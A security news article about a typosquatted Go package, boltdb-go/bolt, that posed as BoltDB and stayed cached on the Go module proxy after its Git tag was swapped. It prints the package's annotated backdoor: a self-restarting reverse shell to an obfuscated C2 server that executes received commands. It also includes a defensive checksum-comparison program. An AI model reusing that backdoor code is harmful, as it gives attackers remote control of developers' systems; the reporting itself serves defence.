Typosquatting in the Go Ecosystem: Fake Bolt DB Package Discovered


In the Go programming language ecosystem, Socket researchers have discovered a malicious typosquatting package that poses as the BoltDB module. The package contains a backdoor for remote code execution and relies on the Go module mirror (proxy) service to remain cached. At the same time, the Git tag was swapped to hide the malware from manual inspection.


Typosquatting is not a new topic: in recent years the PyPI and npm package managers have repeatedly seen incidents in which malicious code was hidden in packages whose names closely resemble those of popular libraries, in order to lure developers into downloading the malicious package.

In the current case, an attacker created a malicious Go package named boltdb-go/bolt, which is deceptively similar to the widely used, legitimate boltdb/bolt package. After the malicious package had been cached by the Go module proxy, the attacker replaced the Git tag in the source repository so that it points to a clean, legitimate version. As a result, the malicious version remained available to developers using the proxy, even if they manually inspected the GitHub repository.

A code example from Socket's blog post, annotated with comments, shows how the attacker hid a backdoor in the db.go file and how it is installed and activated:

```go
func ApiInit() {
  go func() {
    defer func() {
      // Persistence mechanism:
      // If the function panics (e.g. connection loss),
      // restart after 30 seconds
      if r := recover(); r != nil {
        time.Sleep(30 * time.Second)
        ApiInit()
      }
    }()

    for {
      d := net.Dialer{Timeout: 10 * time.Second}

      // Obfuscated C2 connection:
      // Constructs a hidden IP address and port using _r()
      conn, err := d.Dial("tcp",
                          _r(strconv.Itoa(MaxMemSize)+
                          strconv.Itoa(MaxIndex)+":"+
                          strconv.Itoa(MaxPort)))
      if err != nil {
        // Stealth:
        // If the connection fails, retry in
        // 30 seconds to avoid immediate detection
        time.Sleep(30 * time.Second)
        continue
      }

      // Remote command execution loop
      // Reads incoming commands and executes them
      for {
        message, _ := bufio.NewReader(conn).ReadString('\n')
        args, err := shellwords.Parse(strings.TrimSuffix(message, "\n"))
        if err != nil {
          fmt.Fprintf(conn, "Parse err: %s\n", err)
          continue
        }
        // Execution of arbitrary shell commands
        var out []byte
        if len(args) == 1 {
          out, err = exec.Command(args[0]).Output()
        } else {
          out, err = exec.Command(args[0], args[1:]...).Output()
        }

        // Exfiltration:
        // Sends the command output or error back
        // to the threat actor
        if err != nil {
          fmt.Fprintf(conn, "%s\n", err)
        }
        fmt.Fprintf(conn, "%s\n", out)
      }
    }
  }()
}
```

Go modules are designed to be immutable after publication: every user who downloads a particular version of a module always receives the same bytes. The goal is to guarantee build integrity and reproducibility by preventing silent changes after publication and tampering in transit.

Although attackers can exploit this immutability to keep malicious code cached permanently, the property is a significant security benefit, since it raises confidence in the stability of a module.

The malicious package boltdb-go/bolt is equipped with a backdoor that establishes a connection to a remote C2 (command-and-control) server. This connection lets the attackers send commands to the infected system and execute them there, meaning they can take control of the system. Through the central C2 server the attackers communicate with the compromised system to issue instructions and retrieve data.

The C2 code uses obfuscation techniques to hide the server's IP address, which makes it harder to detect. The backdoor is activated when certain functions of the package are used. It stays active even if it crashes, since it has an automatic restart mechanism.

The incident shows that the package distribution mechanism in the Go ecosystem can also be abused for attacks. Developers should therefore be particularly careful and thoroughly verify the integrity of packages before installing them. According to the blog post, it is especially important to check dependencies for discrepancies and to use advanced security tools that analyze the installed code.
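As an added example (not code from Socket's post or from this article), the following Go program recomputes the h1: directory checksum that go.sum and the Go module proxy use and compares a proxy-served copy of a module against a fresh checkout of the same tag, which is the discrepancy the immutability paragraph above describes; the file contents and the v1.0.0 version label are constructed placeholders.

```go
package main

import (
	"crypto/sha256"
	"encoding/base64"
	"encoding/hex"
	"fmt"
	"sort"
)

// hash1 recomputes the "h1:" checksum used in go.sum and by the module proxy:
// one "<sha256 hex>  <name>\n" line per file, sorted by name, then hashed again.
func hash1(files map[string]string) string {
	names := make([]string, 0, len(files))
	for n := range files {
		names = append(names, n)
	}
	sort.Strings(names)
	h := sha256.New()
	for _, n := range names {
		fh := sha256.Sum256([]byte(files[n]))
		fmt.Fprintf(h, "%s  %s\n", hex.EncodeToString(fh[:]), n)
	}
	return "h1:" + base64.StdEncoding.EncodeToString(h.Sum(nil))
}

// tagSwapped reports whether the copy served by the proxy differs from what
// the repository shows at the same tag, returning both checksums for logging.
func tagSwapped(proxyFiles, gitFiles map[string]string) (bool, string, string) {
	p, g := hash1(proxyFiles), hash1(gitFiles)
	return p != g, p, g
}

// Constructed sample trees (placeholder version and contents, not the real module).
const prefix = "github.com/boltdb-go/bolt@v1.0.0/"

var proxyCopy = map[string]string{
	prefix + "go.mod": "module github.com/boltdb-go/bolt\n",
	prefix + "db.go":  "package bolt\n\nfunc ApiInit() { /* backdoor */ }\n",
}
var gitCopy = map[string]string{
	prefix + "go.mod": "module github.com/boltdb-go/bolt\n",
	prefix + "db.go":  "package bolt\n\nfunc Open() {}\n",
}

func main() {
	swapped, p, g := tagSwapped(proxyCopy, gitCopy)
	fmt.Printf("proxy %s\ngit   %s\nswapped: %v\n", p, g, swapped)
}
```

In practice the proxy-side checksum is the Sum field of `go mod download -json module@version`, and the repository-side one comes from the same command run with GOPROXY=direct against a clean module cache.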

To make the Go module ecosystem more resilient against such attacks, greater awareness of the potential dangers and stronger security measures are needed.

Further information is provided in the blog post from Socket.


(MDO)
